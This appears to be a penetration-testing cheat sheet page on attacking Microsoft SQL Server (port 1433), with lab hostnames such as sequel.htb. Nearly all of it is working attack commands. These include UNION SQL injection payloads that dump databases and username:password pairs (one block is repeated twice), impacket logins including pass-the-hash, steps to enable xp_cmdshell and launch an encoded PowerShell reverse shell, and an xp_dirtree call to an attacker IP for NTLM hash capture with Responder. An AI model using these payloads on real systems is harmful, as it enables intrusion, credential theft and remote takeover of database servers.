1433 MSSQL

Description

Link

0. MS-sql-injection Commands

Union Payloads

First identify the injection and then start performing :

Identify version

union select 1,@@VERSION,3,4,5,6--

Identify current database

union select 1,(select DB_NAME()),3,4,5,6--

List Databases (The master table default table in MSSQL)

UNION ALL SELECT 1,NAME,3,4,5,6 FROM master..sysdatabases

List Tables (DB=master)

UNION ALL SELECT 1,NAME,3,4,5,6 FROM <DATABASE NAME>..sysobjects-- -
--
UNION ALL SELECT 1,NAME,3,4,5,6 FROM master..sysobjects-- -

List user table (xtype='U')

UNION ALL SELECT 1,NAME,3,4,5,6 FROM streamio..sysobjects WHERE XTYPE='U'-- -

List Columns (DB=streamio , TB=users)

SELECT name FROM <DATABASE-NAME>..syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLE-NAME>')-- -
--
SELECT name FROM STREAMIO..syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')-- -

Extract Data

UNION SELECT 1,<COLUMN>,3,4,5,6 FROM <DATABASE>..<TABLE>-- -
--
UNION SELECT 1,username,3,4,5,6 FROM STREAMIO..users-- -

Extract multiple data in single column

UNION SELECT 1,CONCAT(username, ':', password),3,4,5,6 FROM STREAMIO..users-- -
--
UNION SELECT 1,username||'~'||password,3,4,5,6 FROM STREAMIO..users-- -

1. Authentication

Basic

impacket-mssqlclient sequel.htb/username:password@dc.sequel.htb

impacket-mssqlclient user:pass@sequel.htb

Specific AD domain authentication :-

impacket-mssqlcient -windows-auth PublicUser:GuestUserCantWrite1@sequel.htb

using localhost

# usually used after port-forwarding
impacket-mssqlclient svc_mssql:'Service1'@127.0.0.1 -windows-auth

NTLM hash authentication

python3 mssqlclient.py 'DOMAIN/username@hostname -windows-auth -hashes :<NTLM hash>'

2. Database Enumeration

list users

SELECT name FROM master.sys.sql_logins;

SELECT name FROM sys.databases;

Get version , user , database

select @@version;
select user_name();
SELECT name FROM master.dbo.sysdatabases;

Cheat-sheet

https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

3. RCE (xp_cmdshell enabled)

if xp_cmdshell already enabled

SQL> xp_cmdshell 'whoami';

#rev-shell 
SQL> xp-cmdshell powershell -e base-64-encoded-revserse-shell

if shell not enabled , try this to enable it:-

SQL> EXEC sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;

4. Capture Hash (xp_cmdshell disabled)

In order to capture start responder on attacking machine and execute or access anything on victi machine in order to achieve his hash

On Attacker :-

sudo responder -I tun0

On Victim :-

xp_dirtree '\\<attacker_IP>\any\thing'

we will get NTLM hash on responder.py server

Responder Cheat-sheet

KSEC ARK - Pentesting and redteam knowledge base | Responder - CheatSheetKSEC ARK - Pentesting and redteam knowledge base

UNION PAYLOADS

Identify version

union select 1,@@VERSION,3,4,5,6--

Identify current database

union select 1,(select DB_NAME()),3,4,5,6--

List Databases (The master table default table in MSSQL)

UNION ALL SELECT 1,NAME,3,4,5,6 FROM master..sysdatabases

List Tables (DB=master)

UNION ALL SELECT 1,NAME,3,4,5,6 FROM <DATABASE NAME>..sysobjects-- -
--
UNION ALL SELECT 1,NAME,3,4,5,6 FROM master..sysobjects-- -

List user table (xtype='U')

UNION ALL SELECT 1,NAME,3,4,5,6 FROM streamio..sysobjects WHERE XTYPE='U'-- -

List Columns (DB=streamio , TB=users)

SELECT name FROM <DATABASE-NAME>..syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLE-NAME>')-- -
--
SELECT name FROM STREAMIO..syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')-- -

Extract Data

UNION SELECT 1,<COLUMN>,3,4,5,6 FROM <DATABASE>..<TABLE>-- -
--
UNION SELECT 1,username,3,4,5,6 FROM STREAMIO..users-- -

Extract multiple data in single column

UNION SELECT 1,CONCAT(username, ':', password),3,4,5,6 FROM STREAMIO..users-- -
--
UNION SELECT 1,username||'~'||password,3,4,5,6 FROM STREAMIO..users-- -

Previous389 , 636 , 3268 , 3269 LDAP Next3128 SQUID

Last updated 7 months ago

hashtagLink

hashtag0. MS-sql-injection Commands

hashtag1. Authentication

hashtag2. Database Enumeration

hashtag3. RCE (xp_cmdshell enabled)